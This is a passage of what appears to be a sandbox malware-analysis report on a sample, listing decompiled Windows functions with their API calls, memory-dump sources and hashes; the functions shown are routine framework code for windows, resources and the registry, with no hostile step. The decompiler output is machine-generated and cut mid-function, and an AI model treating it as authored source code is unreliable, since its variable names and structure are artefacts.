      				if(_t50 == 0) {
      					L4:
      					E009B8782(_t51);
      				}
      				_t7 = _t50 + 0x74; // 0x74
      				_t51 = _t7;
      				_t41 = E009A843B(_t50, _t7, 0, _t55, _t59);
      				if(_t41 == 0) {
      					goto L4;
      				}
      				 *((intOrPtr*)(_t41 + 4)) = _t55;
      				 *((intOrPtr*)(_t55 + 0x2c)) = GetCurrentThread();
      				 *((intOrPtr*)(_t55 + 0x30)) = GetCurrentThreadId();
      				 *((intOrPtr*)(_t50 + 4)) = _t55;
      				 *((short*)(_t55 + 0x9a)) = 0;
      				 *((short*)(_t55 + 0x98)) = 0;
      				 *((intOrPtr*)(_t55 + 0x44)) = 0;
      				 *((intOrPtr*)(_t55 + 0x80)) = 0;
      				 *((intOrPtr*)(_t55 + 0x68)) = 0;
      				 *((intOrPtr*)(_t55 + 0x6c)) = 0;
      				 *((intOrPtr*)(_t55 + 0x58)) = 0;
      				 *((intOrPtr*)(_t55 + 0x64)) = 0;
      				 *((intOrPtr*)(_t55 + 0x8c)) = 0;
      				 *((intOrPtr*)(_t55 + 0x5c)) = 0;
      				 *((intOrPtr*)(_t55 + 0x48)) = 0;
      				 *((intOrPtr*)(_t55 + 0x94)) = 0;
      				 *((intOrPtr*)(_t55 + 0x90)) = 0;
      				 *((intOrPtr*)(_t55 + 0x84)) = 0;
      				 *((intOrPtr*)(_t55 + 0x88)) = 0;
      				 *((intOrPtr*)(_t55 + 0x74)) = 0;
      				 *((intOrPtr*)(_t55 + 0x78)) = 0;
      				 *((intOrPtr*)(_t55 + 0x9c)) = 0;
      				 *((intOrPtr*)(_t55 + 0xa4)) = 0;
      				 *((intOrPtr*)(_t55 + 0x60)) = 0;
      				 *((intOrPtr*)(_t55 + 0x70)) = 0;
      				 *((intOrPtr*)(_t55 + 0xa0)) = 0x200;
      				 *((intOrPtr*)(_t55 + 0xac)) = 0;
      				 *((intOrPtr*)(_t55 + 0xb0)) = 0x493e0;
      				 *((intOrPtr*)(_t55 + 0xb4)) = 1;
      				return E00AAD30A(_t55);
      			}

      0x009b210a
      0x009b210a
      0x009b210a
      0x009b210a
      0x009b2111
      0x009b2116
      0x009b2118
      0x009b211b
      0x009b2122
      0x009b2125
      0x009b212b
      0x009b212e
      0x009b213e
      0x009b2130
      0x009b2133
      0x009b2138
      0x009b2139
      0x009b2139
      0x009b2146
      0x009b2148
      0x009b214a
      0x009b214c
      0x009b214c
      0x009b214c
      0x009b2151
      0x009b2151
      0x009b2154
      0x009b215b
      0x00000000
      0x00000000
      0x009b215d
      0x009b2166
      0x009b216f
      0x009b2172
      0x009b2177
      0x009b217e
      0x009b2185
      0x009b2188
      0x009b218e
      0x009b2191
      0x009b2194
      0x009b2197
      0x009b219a
      0x009b21a0
      0x009b21a3
      0x009b21a6
      0x009b21ac
      0x009b21b2
      0x009b21b8
      0x009b21be
      0x009b21c1
      0x009b21c4
      0x009b21ca
      0x009b21d0
      0x009b21d3
      0x009b21d6
      0x009b21e0
      0x009b21e6
      0x009b21f0
      0x009b2201

      APIs
      • __EH_prolog3.LIBCMT ref: 009B2111
        • Part of subcall function 009B2E7D: __EH_prolog3.LIBCMT ref: 009B2E84
      • __strdup.LIBCMT ref: 009B2133
      • GetCurrentThread.KERNEL32 ref: 009B2160
      • GetCurrentThreadId.KERNEL32 ref: 009B2169
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CurrentH_prolog3Thread$__strdup
      • String ID:
      • API String ID: 4206445780-0
      • Opcode ID: 138178b98f59d2dd5e35423d389c9eb75695a7f67c7874be5c2e92a2829e6b66
      • Instruction ID: f3782d452525dd22cf407dd43da3aafb394453b33533a012a9d4f7e642be1d66
      • Opcode Fuzzy Hash: 138178b98f59d2dd5e35423d389c9eb75695a7f67c7874be5c2e92a2829e6b66
      • Instruction Fuzzy Hash: D9317CB0901B008FD721DF7AC68538AFBE8BFA5710F10891FD5AA87622DBB0A541CF55
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 90%
      			E009B4B50(void* __ecx) {
      				void* _v8;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t24;
      				void* _t29;
      				void* _t31;
      				struct HINSTANCE__* _t33;
      				signed int _t35;
      				signed int _t36;
      				void* _t38;
      				signed int* _t41;
      
      				_push(__ecx);
      				_push(_t29);
      				_t38 = __ecx;
      				_t43 =  *((intOrPtr*)(__ecx + 0x78));
      				_t41 =  *(__ecx + 0x80);
      				_v8 =  *((intOrPtr*)(__ecx + 0x7c));
      				if( *((intOrPtr*)(__ecx + 0x78)) != 0) {
      					_t33 =  *(E009BD77F(_t29, __ecx, _t41, _t43) + 0xc);
      					_v8 = LoadResource(_t33, FindResourceA(_t33,  *(_t38 + 0x78), 5));
      				}
      				if(_v8 != 0) {
      					_t41 = LockResource(_v8);
      				}
      				_t31 = 1;
      				if(_t41 != 0) {
      					_t36 =  *_t41;
      					if(_t41[0] != 0xffff) {
      						_t24 = _t41[2] & 0x0000ffff;
      						_t35 = _t41[3] & 0x0000ffff;
      					} else {
      						_t36 = _t41[3];
      						_t24 = _t41[4] & 0x0000ffff;
      						_t35 = _t41[5] & 0x0000ffff;
      					}
      					if((_t36 & 0x00001801) != 0 || _t24 != 0 || _t35 != 0) {
      						_t31 = 0;
      					}
      				}
      				if( *(_t38 + 0x78) != 0) {
      					FreeResource(_v8);
      				}
      				return _t31;
      			}

      APIs
      • FindResourceA.KERNEL32(?,00000000,00000005), ref: 009B4B7B
      • LoadResource.KERNEL32(?,00000000), ref: 009B4B83
      • LockResource.KERNEL32(00000000), ref: 009B4B95
      • FreeResource.KERNEL32(00000000), ref: 009B4BE3
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Resource$FindFreeLoadLock
      • String ID:
      • API String ID: 1078018258-0
      • Opcode ID: 7751a685476da6303ff7eb93bf578fcb0ed503aacc92c8654e776d6e98c7f548
      • Instruction ID: 16c34936e4a59fe7ff8a97c9989c9dd693472f9ce45d52f4ddffa2d3900baba4
      • Opcode Fuzzy Hash: 7751a685476da6303ff7eb93bf578fcb0ed503aacc92c8654e776d6e98c7f548
      • Instruction Fuzzy Hash: A7110874100620EFD7208FA5CA88BFAB3F8FF04321F108569E95243551E770ED50E760
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 92%
      			E009AB2F2(intOrPtr __ebx, intOrPtr __edx, struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
      				signed int _v8;
      				long _v16;
      				void _v20;
      				void* __edi;
      				void* __esi;
      				signed int _t10;
      				intOrPtr _t12;
      				intOrPtr _t14;
      				long _t18;
      				intOrPtr _t22;
      				struct HWND__* _t23;
      				intOrPtr _t26;
      				void* _t27;
      				struct HDC__* _t28;
      				signed int _t29;
      
      				_t26 = __edx;
      				_t22 = __ebx;
      				_t10 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t10 ^ _t29;
      				_t23 = _a8;
      				_t28 = _a4;
      				_t27 = _a16;
      				if(_t28 == 0 || _t27 == 0) {
      					L10:
      					_t12 = 0;
      				} else {
      					_t14 = _a12;
      					if(_t14 == 1 || _t14 == 0 || _t14 == 5 || _t14 == 2 && E009BBA6E(_t23, _t14) == 0) {
      						goto L10;
      					} else {
      						GetObjectA(_t27, 0xc,  &_v20);
      						SetBkColor(_t28, _v16);
      						_t18 = _a20;
      						if(_t18 == 0xffffffff) {
      							_t18 = GetSysColor(8);
      						}
      						SetTextColor(_t28, _t18);
      						_t12 = 1;
      					}
      				}
      				return E00AAB46A(_t12, _t22, _v8 ^ _t29, _t26, _t27, _t28);
      			}

      APIs
      • GetObjectA.GDI32(?,0000000C,?), ref: 009AB33F
      • SetBkColor.GDI32(?,?), ref: 009AB349
      • GetSysColor.USER32(00000008), ref: 009AB359
      • SetTextColor.GDI32(?,?), ref: 009AB361
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Color$ObjectText
      • String ID:
      • API String ID: 829078354-0
      • Opcode ID: 28b3347b70fc0684d467dc377201027e5234b64c84118f7771723bfac65cd4df
      • Instruction ID: cc176a9295b471dec5b8d36e550c692ed6e9c53eb46b8f0266e5850a4bab72b0
      • Opcode Fuzzy Hash: 28b3347b70fc0684d467dc377201027e5234b64c84118f7771723bfac65cd4df
      • Instruction Fuzzy Hash: 3B116932602204ABCF24DFA89C59AAF77ACBF4A710F550616F916D31A2CB30DD0187A0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 94%
      			E009B34BF(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
      				signed int _v8;
      				char _v24;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				signed int _t13;
      				CHAR* _t21;
      				char* _t24;
      				intOrPtr _t28;
      				void* _t30;
      				signed int _t31;
      
      				_t28 = __edx;
      				_t13 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t13 ^ _t31;
      				_t24 = _a8;
      				_t30 = __ecx;
      				_t29 = _a4;
      				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
      					swprintf( &_v24, 0x10, "%d", _a12);
      					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(_t30 + 0x6c));
      				} else {
      					_t30 = E009B33F8(__ecx, _t29, 0);
      					if(_t30 != 0) {
      						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
      						_t29 = _t21;
      						RegCloseKey(_t30);
      						_t18 = 0 | _t21 == 0x00000000;
      					}
      				}
      				return E00AAB46A(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
      			}

      APIs
      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 009B34FC
      • RegCloseKey.ADVAPI32(00000000), ref: 009B3505
      • swprintf.LIBCMT ref: 009B3522
      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 009B3533
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ClosePrivateProfileStringValueWriteswprintf
      • String ID:
      • API String ID: 22681860-0
      • Opcode ID: 807c3651bf00217b17a43bd2fe52f13f9bc6a2105540db26db2bb19b293e7331
      • Instruction ID: c72daa7952ade6a8472b6396d73c3dd269c4c763af669da5a1df87e20cdf3126
      • Opcode Fuzzy Hash: 807c3651bf00217b17a43bd2fe52f13f9bc6a2105540db26db2bb19b293e7331
      • Instruction Fuzzy Hash: 0201A172501309BBDB10EF648D46FAF77ACEF48714F10441ABA02A7281DBB4EA0187A0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 91%
      			E009B586E(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
      				void* _v8;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				void* _t18;
      				struct HRSRC__* _t25;
      				void* _t28;
      				intOrPtr* _t34;
      				void* _t36;
      				intOrPtr _t37;
      				struct HINSTANCE__* _t39;
      
      				_push(__ecx);
      				_t28 = 0;
      				_push(_t36);
      				_t34 = __ecx;
      				_v8 = 0;
      				_t40 = _a8;
      				if(_a8 == 0) {
      					L4:
      					_t37 = _a4;
      					_a8 = 1;
      					if(_t28 != 0) {
      						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
      						if(_v8 != 0) {
      							FreeResource(_v8);
      						}
      					}
      					if( *((intOrPtr*)(_t37 + 0x68)) != 0) {
      						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x68)))) + 0xa0))(_a12);
      					}
      					_t18 = _a8;
      					L10:
      					return _t18;
      				}
      				_t39 =  *(E009BD77F(0, __ecx, _t36, _t40) + 0xc);
      				_t25 = FindResourceA(_t39, _a8, 0xf0);
      				if(_t25 == 0) {
      					goto L4;
      				}
      				_t18 = LoadResource(_t39, _t25);
      				_v8 = _t18;
      				if(_t18 == 0) {
      					goto L10;
      				}
      				_t28 = LockResource(_t18);
      				goto L4;
      			}

      APIs
      • FindResourceA.KERNEL32(?,?,000000F0), ref: 009B5894
      • LoadResource.KERNEL32(?,00000000), ref: 009B58A0
      • LockResource.KERNEL32(00000000), ref: 009B58AE
      • FreeResource.KERNEL32(00000000), ref: 009B58DC
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Resource$FindFreeLoadLock
      • String ID:
      • API String ID: 1078018258-0
      • Opcode ID: 7eda27cc4d71da75ea4b3676a8ab3a088fc40408f9c1365270798c79cd40e26a
      • Instruction ID: f10c74756839103a2083b6e437c67ab68fa4956355894aae8ce65aa25acb04bc
      • Opcode Fuzzy Hash: 7eda27cc4d71da75ea4b3676a8ab3a088fc40408f9c1365270798c79cd40e26a
      • Instruction Fuzzy Hash: 86113675601309EFDB108FA5CA88BDA7BADEF48360F158069F8069B261DB71DD01DF60
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009AEE78(intOrPtr* __ecx, void* __edx) {
      				void* __ebx;
      				void* __edi;
      				struct HWND__* _t14;
      				intOrPtr* _t19;
      				void* _t20;
      				void* _t23;
      
      				_t23 = __edx;
      				_t21 = __ecx;
      				_t19 = __ecx;
      				if( *((intOrPtr*)( *__ecx + 0x14c))() != 0) {
      					_t21 = __ecx;
      					 *((intOrPtr*)( *__ecx + 0x1ac))();
      				}
      				SendMessageA( *(_t19 + 0x20), 0x1f, 0, 0);
      				E009AD893(_t19, _t21, _t23,  *(_t19 + 0x20), 0x1f, 0, 0, 1, 1);
      				_t22 = _t19;
      				_t20 = E009AE492(_t19, 0);
      				if(_t20 == 0) {
      					E009B8782(_t22);
      				}
      				SendMessageA( *(_t20 + 0x20), 0x1f, 0, 0);
      				E009AD893(_t20, _t22, _t23,  *(_t20 + 0x20), 0x1f, 0, 0, 1, 1);
      				_t14 = GetCapture();
      				if(_t14 != 0) {
      					return SendMessageA(_t14, 0x1f, 0, 0);
      				}
      				return _t14;
      			}

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: MessageSend$Capture
      • String ID:
      • API String ID: 1665607226-0
      • Opcode ID: e31486946950bcdbe625d82afe472352674900913bead8db2c040788d4284acd
      • Instruction ID: d7919c6cea7c140039a10953cd9ea5f707aef22d0b5e33b892b0a890015b8774
      • Opcode Fuzzy Hash: e31486946950bcdbe625d82afe472352674900913bead8db2c040788d4284acd
      • Instruction Fuzzy Hash: 540121313502557BDA306B668CCDF9B3E7AEBCBB10F150479B6459A1A7CAA14801D6A0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 94%
      			E009B0672(void* __ecx, void* __edi, signed int _a4) {
      				void* __ebx;
      				void* __ebp;
      				void* _t16;
      				int _t17;
      				int _t18;
      				intOrPtr _t25;
      				void* _t27;
      				intOrPtr _t34;
      				void* _t36;
      
      				_t36 = __ecx;
      				_t25 =  *((intOrPtr*)(__ecx + 0xc));
      				if(_t25 == 0) {
      					if( *((intOrPtr*)(__ecx + 0x14)) == 0) {
      						L3:
      						_t17 = E009B8782(_t25);
      						L4:
      						asm("sbb edx, edx");
      						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
      						L11:
      						 *((intOrPtr*)(_t36 + 0x18)) = 1;
      						return _t18;
      					}
      					if(_a4 == 0) {
      						_t34 =  *((intOrPtr*)(__ecx + 0x14));
      						if(GetFocus() ==  *(_t34 + 0x20)) {
      							SendMessageA( *(E009AC90B(0, _t25, _t27, GetParent( *(_t34 + 0x20))) + 0x20), 0x28, 0, 0);
      						}
      					}
      					_t18 = E009B0C13( *((intOrPtr*)(_t36 + 0x14)), _a4);
      					goto L11;
      				}
      				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
      					_t17 =  *(__ecx + 8);
      					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
      						goto L4;
      					}
      					goto L3;
      				}
      				return _t16;
      			}

      APIs
      • EnableMenuItem.USER32 ref: 009B06AE
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      • GetFocus.USER32 ref: 009B06C4
      • GetParent.USER32(?), ref: 009B06D2
      • SendMessageA.USER32 ref: 009B06E5
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
      • String ID:
      • API String ID: 4211600527-0
      • Opcode ID: 5a4586ed9471b26cbbbf9ff21211607891b5be2c5fcc4789e72042c4ea9d9ef3
      • Instruction ID: 2fa2c92c0de7b71d607ca27041c3a5c736f970eec6b1025ee8b7b871a7b7a302
      • Opcode Fuzzy Hash: 5a4586ed9471b26cbbbf9ff21211607891b5be2c5fcc4789e72042c4ea9d9ef3
      • Instruction Fuzzy Hash: C9116171100604EFCB349F60DD89DABBBB9FFD8325B14872AF14656864C771EC55CA90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 74%
      			E009A7674(void* __ecx, intOrPtr __edx, void* __eflags, void* _a4) {
      				signed int _v8;
      				char _v268;
      				signed int _v272;
      				int _v276;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t18;
      				void* _t30;
      				intOrPtr _t31;
      				void* _t32;
      				intOrPtr _t37;
      				void* _t38;
      				intOrPtr* _t39;
      				intOrPtr _t40;
      				intOrPtr _t43;
      				signed int _t47;
      				void* _t50;
      
      				_t50 = __eflags;
      				_t37 = __edx;
      				_t32 = __ecx;
      				_t45 = _t47;
      				_t18 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t18 ^ _t47;
      				_t30 = _a4;
      				_push(_t38);
      				E009AC90B(_t30, _t32, _t37, SetActiveWindow( *(__ecx + 0x20)));
      				_v276 = DragQueryFileA(_t30, 0xffffffff, 0, 0);
      				_t23 = E009BD77F(_t30, _t38, DragQueryFileA, _t50);
      				_v272 = _v272 & 0x00000000;
      				_t39 =  *((intOrPtr*)(_t23 + 4));
      				if(_v276 > 0) {
      					do {
      						DragQueryFileA(_t30, _v272,  &_v268, 0x104);
      						 *((intOrPtr*)( *_t39 + 0xa4))( &_v268);
      						_v272 = _v272 + 1;
      						_t23 = _v272;
      					} while (_v272 < _v276);
      				}
      				DragFinish(_t30);
      				_pop(_t40);
      				_pop(_t43);
      				_pop(_t31);
      				return E00AAB46A(_t23, _t31, _v8 ^ _t45, _t37, _t40, _t43);
      			}

      APIs
      • SetActiveWindow.USER32(?), ref: 009A7692
      • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 009A76AB
      • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 009A76DE
      • DragFinish.SHELL32(?), ref: 009A7706
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Drag$FileQuery$ActiveFinishWindow
      • String ID:
      • API String ID: 892977027-0
      • Opcode ID: ef9c9bfb8f2daba858d53b2778fa49abe473a298eb49fb20ac311c843057c832
      • Instruction ID: 24be3ab1a5253df0f903ed8cf7aa28960abd2f2d94dc60f13e28f5ff056f536a
      • Opcode Fuzzy Hash: ef9c9bfb8f2daba858d53b2778fa49abe473a298eb49fb20ac311c843057c832
      • Instruction Fuzzy Hash: B4117071900218ABCB10DB64DD85FDEB7B8FB49310F100596E65AA7191CBB49AC1CF90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 78%
      			E009AD893(void* __ebx, void* __ecx, void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				struct HWND__* _t16;
      				struct HWND__* _t18;
      				struct HWND__* _t20;
      				void* _t22;
      				void* _t23;
      				void* _t24;
      				void* _t25;
      				struct HWND__* _t26;
      
      				_t24 = __edx;
      				_t23 = __ecx;
      				_t22 = __ebx;
      				_t25 = GetTopWindow;
      				_t16 = GetTopWindow(_a4);
      				while(1) {
      					_t26 = _t16;
      					if(_t26 == 0) {
      						break;
      					}
      					__eflags = _a24;
      					if(__eflags == 0) {
      						SendMessageA(_t26, _a8, _a12, _a16);
      					} else {
      						_t20 = E009AC937(_t22, _t23, _t24, _t25, _t26, __eflags, _t26);
      						__eflags = _t20;
      						if(__eflags != 0) {
      							_push(_a16);
      							_push(_a12);
      							_push(_a8);
      							_push( *((intOrPtr*)(_t20 + 0x20)));
      							_push(_t20);
      							E009AD57A(_t22, _t25, _t26, __eflags);
      						}
      					}
      					__eflags = _a20;
      					if(_a20 != 0) {
      						_t18 = GetTopWindow(_t26);
      						__eflags = _t18;
      						if(_t18 != 0) {
      							E009AD893(_t22, _t23, _t24, _t26, _a8, _a12, _a16, _a20, _a24);
      						}
      					}
      					_t16 = GetWindow(_t26, 2);
      				}
      				return _t16;
      			}

      APIs
      • GetTopWindow.USER32(?), ref: 009AD8A3
      • GetTopWindow.USER32(00000000), ref: 009AD8E2
      • GetWindow.USER32(00000000,00000002), ref: 009AD900
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window
      • String ID:
      • API String ID: 2353593579-0
      • Opcode ID: 33a90e57cf65921586eb04c645952f756686851c23969b9ed24cb877fd1391d2
      • Instruction ID: 912442cb727e5745f965dea2f852c8a5581f6e8921b7f55b316c455b505dfa12
      • Opcode Fuzzy Hash: 33a90e57cf65921586eb04c645952f756686851c23969b9ed24cb877fd1391d2
      • Instruction Fuzzy Hash: E3010C3200261ABBCF126F95DC08EDF3B2AEF8A350F054425FA1665460C73AC931EBE1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 91%
      			E009AD018(void* __ebx, void* __ecx, void* __edx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
      				void* __edi;
      				void* __esi;
      				struct HWND__* _t9;
      				struct HWND__* _t10;
      				void* _t14;
      				void* _t15;
      				void* _t16;
      				struct HWND__* _t17;
      				struct HWND__* _t18;
      
      				_t15 = __edx;
      				_t14 = __ecx;
      				_t13 = __ebx;
      				_t9 = GetDlgItem(_a4, _a8);
      				_t16 = GetTopWindow;
      				_t17 = _t9;
      				if(_t17 == 0) {
      					L6:
      					_t10 = GetTopWindow(_a4);
      					while(1) {
      						_t18 = _t10;
      						__eflags = _t18;
      						if(_t18 == 0) {
      							goto L10;
      						}
      						_t10 = E009AD018(_t13, _t14, _t15, _t18, _a8, _a12);
      						__eflags = _t10;
      						if(_t10 == 0) {
      							_t10 = GetWindow(_t18, 2);
      							continue;
      						}
      						goto L10;
      					}
      				} else {
      					if(GetTopWindow(_t17) == 0) {
      						L3:
      						_push(_t17);
      						if(_a12 == 0) {
      							return E009AC90B(_t13, _t14, _t15);
      						}
      						_t10 = E009AC937(_t13, _t14, _t15, _t16, _t17, __eflags);
      						__eflags = _t10;
      						if(_t10 == 0) {
      							goto L6;
      						}
      					} else {
      						_t10 = E009AD018(__ebx, _t14, _t15, _t17, _a8, _a12);
      						if(_t10 == 0) {
      							goto L3;
      						}
      					}
      				}
      				L10:
      				return _t10;
      			}

      APIs
      • GetDlgItem.USER32 ref: 009AD025
      • GetTopWindow.USER32(00000000), ref: 009AD038
        • Part of subcall function 009AD018: GetWindow.USER32(00000000,00000002), ref: 009AD07F
      • GetTopWindow.USER32(?), ref: 009AD068
      Yara matches
      Similarity
      • API ID: Window$Item
      • String ID:
      • API String ID: 369458955-0
      • Opcode ID: a4a41dad175f287e833e1a78b82114f30b44ebf40e052cbe2e4d55a6deaf6ae9
      • Instruction ID: ff5f58b5126adc2ac4f07fe0b64a15487de929ff8312ce9972dc6b89656fe0f8
      • Opcode Fuzzy Hash: a4a41dad175f287e833e1a78b82114f30b44ebf40e052cbe2e4d55a6deaf6ae9
      • Instruction Fuzzy Hash: 26014B36003639B7CF322FA18C08E9F3B19AF833A0F014125FD0295510E735CA1396E5
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 34%
      			E009D3912(void* __ecx, short* _a4) {
      				int _v8;
      				int _v12;
      				void* __ebp;
      				int _t9;
      				char* _t10;
      				char* _t12;
      				void* _t14;
      				char* _t15;
      				void* _t18;
      
      				_t17 = __ecx;
      				_push(__ecx);
      				_push(__ecx);
      				if(_a4 != 0) {
      					__imp__#7(_a4, _t18, _t14);
      					_v12 = _t9;
      					_t10 = WideCharToMultiByte(0, 0, _a4, _t9, 0, 0, 0, 0);
      					_v8 = _t10;
      					__imp__#150(0, _t10);
      					_t15 = _t10;
      					if(_t15 == 0) {
      						E009B874A(_t17);
      					}
      					WideCharToMultiByte(0, 0, _a4, _v12, _t15, _v8, 0, 0);
      					_t12 = _t15;
      				} else {
      					_t12 = 0;
      				}
      				return _t12;
      			}

      APIs
      • SysStringLen.OLEAUT32(00000000), ref: 009D392A
      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000C,0000000C,?,00A0F358,00000000,00000018,00A0F6B4), ref: 009D3943
      • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 009D394A
      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,0000000C,0000000C,?,00A0F358,00000000,00000018,00A0F6B4), ref: 009D3969
      Yara matches
      Similarity
      • API ID: Byte$CharMultiStringWide$Alloc
      • String ID:
      • API String ID: 3384502665-0
      • Opcode ID: 234ddc2ee248f93f6408bd503c8c01677755e343819a84cb846da1fa7afa8c24
      • Instruction ID: c67c81d5df751a6671c9f46724559cbc5fe208979302081b699f46d80f319833
      • Opcode Fuzzy Hash: 234ddc2ee248f93f6408bd503c8c01677755e343819a84cb846da1fa7afa8c24
      • Instruction Fuzzy Hash: D2F044B6502128BF9B215BA6CD4CCEFBF6CEF863F57108026F90592110D6714E41DAF0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 37%
      			E009B1FB0(void* __ecx, char* _a4, int _a8) {
      				short* _v8;
      				short* _t12;
      				short* _t13;
      				int _t21;
      
